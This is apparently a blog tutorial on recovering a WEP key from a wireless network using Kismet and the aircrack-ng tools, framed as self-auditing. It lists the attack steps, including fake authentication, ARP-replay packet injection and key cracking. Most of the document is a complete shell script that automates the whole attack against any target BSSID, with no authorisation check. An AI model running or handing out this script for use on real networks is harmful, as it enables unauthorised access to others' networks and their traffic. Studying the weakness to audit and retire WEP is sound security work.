I recently stumbled upon a website that spoke of how the FBI was able to crack a 128-bit WEP password in 3-4 minutes. In this article I am going to go through the steps (in a more condensed form than the linked page gives them) so that you can audit your own wireless network, or spread the word to wireless network administrators you may know. One thing worth knowing up front: what WEP sells as a "128-bit" key is a 104-bit secret key plus a 24-bit per-packet IV, and it is those IVs the attack collects.
The tools listed here run on Linux (Kismet and the Aircrack suite are *nix programs), so they will not be very friendly to anyone unfamiliar with it. If you get stuck, or if you are adamant about doing this yourself, search for help on each tool, or alternatively RTFM.
- Put the wireless card into monitor mode, then run Kismet to find nearby networks and note the target's SSID, BSSID (the access point's MAC) and channel.
- Run Airodump on that channel, filtered to the target BSSID, writing the capture to a file.
- Use Aireplay to fake-authenticate to the access point (it silently drops injected frames from stations it has not seen associate) and then replay an ARP request on the targeted network. Aireplay's ARP request replay mode finds a suitable packet itself by matching the BSSID MAC you got from Kismet against the BSSID of each captured frame; on an idle network with no ARP requests to catch, deauthenticating an associated client makes it send one when it reconnects.
- Airodump should start getting a lot of new IVs: every replayed ARP request makes the access point answer with a freshly encrypted frame, and each one carries a new IV.
- 1,000 IVs is nowhere near enough. The statistical attacks in the original Aircrack (FMS and KoreK) need hundreds of thousands to over a million IVs for a 104-bit ("128-bit") key, and even aircrack-ng's newer PTW attack typically needs somewhere around 40,000 to 85,000. In practice you leave Airodump and Aireplay running and keep retrying Aircrack.
- Run Aircrack on the captured file, selecting the target BSSID.
- A WEP key should show up shortly. If Aircrack reports that it failed, keep capturing and try again a few tens of thousands of IVs later.
Programs: Kismet, Aircrack (includes Airodump, Aireplay, Aircrack, and Airdecap). The maintained fork of the suite is aircrack-ng, where the same tools are named airodump-ng, aireplay-ng, aircrack-ng and airdecap-ng, with airmon-ng added for switching a card into monitor mode.
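The whole procedure as one script, added here as an example; it is not code from the original article or from the aircrack project. It assumes Linux, the aircrack-ng fork (airodump-ng, aireplay-ng, aircrack-ng on the PATH, run as root) and a card already in monitor mode via airmon-ng; the Kismet step stays manual, so the BSSID, channel and ESSID are passed in as arguments. The script name, the function names, the capture prefix and the fragment of aircrack-ng output used to illustrate the key-parsing function are my own; the command-line flags are the real ones the tools accept.

```shell
#!/bin/sh
# wep_audit.sh (hypothetical name): drive the aircrack-ng suite through the
# steps listed above.
# Usage, as root, after `airmon-ng start wlan0` has created a monitor
# interface (wlan0mon on current versions):
#   ./wep_audit.sh run <BSSID> <channel> <ESSID> <monitor-iface> [capture-prefix]
set -eu

die() { printf 'error: %s\n' "$*" >&2; exit 1; }

# True if $1 looks like a MAC address: six colon-separated hex octets.
mac_valid() {
    printf '%s\n' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# True if $1 is a 2.4 GHz channel number (1-14); WEP networks are 802.11b/g era.
channel_valid() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# Pull the recovered key out of aircrack-ng's output. On success aircrack-ng
# prints a line of the form "KEY FOUND! [ 1F:1F:1F:1F:1F ]"; while it is still
# short of IVs it prints "Failed. Next try with N IVs." instead. Prints the
# key and returns 0, or prints nothing and returns 1.
extract_key() {
    _key=$(printf '%s\n' "$1" |
           sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *].*/\1/p' | head -n 1)
    [ -n "$_key" ] || return 1
    printf '%s\n' "$_key"
}

require_tools() {
    for _t in "$@"; do
        command -v "$_t" >/dev/null 2>&1 || die "$_t not found in PATH"
    done
}

main() {
    [ "$#" -ge 4 ] || die "usage: $0 run <BSSID> <channel> <ESSID> <monitor-iface> [prefix]"
    bssid=$1; channel=$2; essid=$3; mon=$4; prefix=${5:-wep-audit}
    mac_valid "$bssid" || die "bad BSSID: $bssid"
    channel_valid "$channel" || die "bad channel: $channel"
    require_tools airodump-ng aireplay-ng aircrack-ng
    # Source MAC for the injected frames: the monitor interface's own address.
    ourmac=$(cat "/sys/class/net/$mon/address")

    # Airodump: lock to the target's channel and BSSID; the capture lands in
    # <prefix>-01.cap (airodump-ng numbers its output files).
    airodump-ng --bssid "$bssid" -c "$channel" -w "$prefix" "$mon" >/dev/null 2>&1 &
    dump_pid=$!
    trap 'kill "$dump_pid" "${replay_pid:-}" 2>/dev/null' EXIT
    sleep 5

    # Aireplay: one-shot fake authentication first (set -e aborts the run if
    # the AP refuses us, since injection would be pointless), then ARP request
    # replay, which keeps the AP producing fresh IVs until we stop it.
    aireplay-ng -1 0 -e "$essid" -a "$bssid" -h "$ourmac" "$mon"
    aireplay-ng -3 -b "$bssid" -h "$ourmac" "$mon" >/dev/null 2>&1 &
    replay_pid=$!

    # Aircrack: retry on the growing capture until the key falls out.
    while :; do
        sleep 60
        out=$(aircrack-ng -b "$bssid" "$prefix-01.cap" 2>&1 || true)
        if key=$(extract_key "$out"); then
            printf 'WEP key for %s: %s\n' "$bssid" "$key"
            return 0
        fi
        printf 'no key yet, still collecting IVs\n' >&2
    done
}

if [ "${1:-}" = "run" ]; then
    shift
    main "$@"
fi
```

The retry loop is the point of the script: aircrack-ng exits with "Failed" when the capture does not yet hold enough IVs, so rather than stopping at some IV count you keep Airodump and Aireplay running and re-run the cracker against the same file every minute until `extract_key` finds a `KEY FOUND!` line.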